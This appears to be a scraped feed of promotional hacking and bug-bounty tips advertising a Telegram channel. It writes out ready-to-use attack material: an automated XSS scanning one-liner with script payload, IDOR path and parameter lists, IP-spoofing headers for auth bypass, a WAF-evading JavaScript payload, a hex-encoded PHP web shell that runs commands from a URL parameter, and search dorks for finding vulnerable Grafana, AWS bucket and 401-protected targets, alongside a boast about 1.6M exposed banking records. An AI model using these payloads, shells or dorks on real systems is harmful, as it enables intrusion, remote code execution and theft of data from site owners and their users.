Recently disclosed hackerone critical bug, leaking sensitive informations which can exploitable under few minutes! Rewarded $25,000😏. Read the full POC in my telegram channel 👉🏼

Wayback + httpx + GF + Dalfox. cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done.

🔎Most critical iDOR paths:. /api/user/123./api/v1/user?id=123./api/v1/file?id=123./api/files/123/download./api/issues/123./api/v2/statement/123./download?file=123.pdf. 🔎Parameters: id, uid, profile, file, doc_id, order, ticket, case. Read the full method

X-Forwarded-For: 127.0.0.1.X-Real-IP: 127.0.0.1.X-Client-IP: 127.0.0.1.X-Remote-IP: 127.0.0.1.X-Remote-Addr: 127.0.0.1.True-Client-IP: 127.0.0.1.CF-Connecting-IP: 127.0.0.1.Fastly-Client-IP: 127.0.0.1.Proxy-Client-IP: 127.0.0.1. Read all auth bypass header

🔥Find critical vulnerabilities in js files✨.Looks inside this JS files:. 🔍main, app, runtime, bundle, polyfills, auth, config, settings, local, dev, data, api, session, user,core, client, server, utils, base.Read the full method 👇🏼

XSS in Google 💥

Waf Blocked ❌.javascript:alert(). Waf welcome ✅.javascript:new Function`background="red"`. ✔️ If waf Blocked additional functions then try to change the background color💥. For more join my telegram

✨XSS to account takeover in Paytm!🔥. The payload is big, so grep the payload to my telegram channel i upload it there 👉🏼 Credit ~HACKER_TEAM49

I published my privet tool in GitHub. 𝙎𝙪𝙗𝘾𝙡𝙞𝙘𝙠 One-Click Subdomain Finder. clean, lightweight, and browser-based bookmarklet tool designed for just one click subdomain discovery. No installation, no dependencies, and works directly in your browser!.

ㅤ.𝘿𝙖𝙧𝙠𝙀𝙣𝙙𝙁𝙞𝙣𝙙𝙚𝙧 my own private tool which i used to extract endpoints from browse through passive recon. ✨ Features:.✅ Extract subdomains. ✅ Extract categories endpoints from subdomains. ✅ Extract external domains.

🔥1.6M banking records are uncovered 💥. ✨Contains massive informations inside the DB, is it really Cool? 😎

🤫Unauthenticated WordPress Auth bypass 🔥. After sending the 1st request use the provided last Cookie and send request on /wp-admin and BOOM auth bypassed 💥. For more join my telegram channel 👉🏼

🌀 AWS bucket takeover like a pro and super simple but most of time effective 🔥. 🧠 FOFA Dork:. body="specified bucket does not exist" && (host=" || host="target_domain_name_only") && port="443". ✨ Full methodology on my telegram.

ㅤ.✨Grafana CVE-2025-4123 AWS SSRF @fofabot dork that find all vulnerable versions💯. 👀 Very big Dork:. app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" || body="Grafana v10.0.1" || body="Grafana v10.0.2" . [and more]. 🌀Get the full dork:

🌀I made this payload that able to bypass WAF even IDS to execute RCE✅. <?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>. 👀Hex decode:.if($x_=$_GET[0]){system($x_);}. 🔥For more join my telegram channel.

🌀Chrome DevTools is actually a webpage itself🙆🏼. Url:.devtools://devtools/bundled/devtools_app.html. Try this:.🔥 Open the URL .🔥 Then hit F12 inside DevTools.🔥 BOOM — you're debugging the DevTools itself 🤯. ✨For more join my telegram channel ㅤ

Using FOFA @fofabot Dorking you can see the content behind 401 unauthenticated🤯. Dork:.domain="401_subdomain" && (body=".php" || body=".pdf" || body=".xls" || body=".html" || body=".js" || body=".json" || body=".jpg" || body=".conf").Read full on telegram.

ㅤ.🔥Find all VDP in world wide using this simple dork😎. Dork:.(body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443". ✨For more bugbounty & pen testing tips join my telegram channel 🤍.

ㅤ.🔥RCE in Auth Login ☠️. Before testing SQLi, test RCE in login page 😎 . Join my telegram channel for more bug bounty and penetration testing .

ㅤ.💥arbitrary administrator role user creation vai using WordPress plugin💯. For more join my telegram channel 👉🏼

🔥Out of scope target lead in-Scope target AUTH bypass vulnerability💥. The target was use a proxy server to load content used by the proxy. But here comes the twist, i found a file in there proxy server . Read the full story👉🏼ㅤ.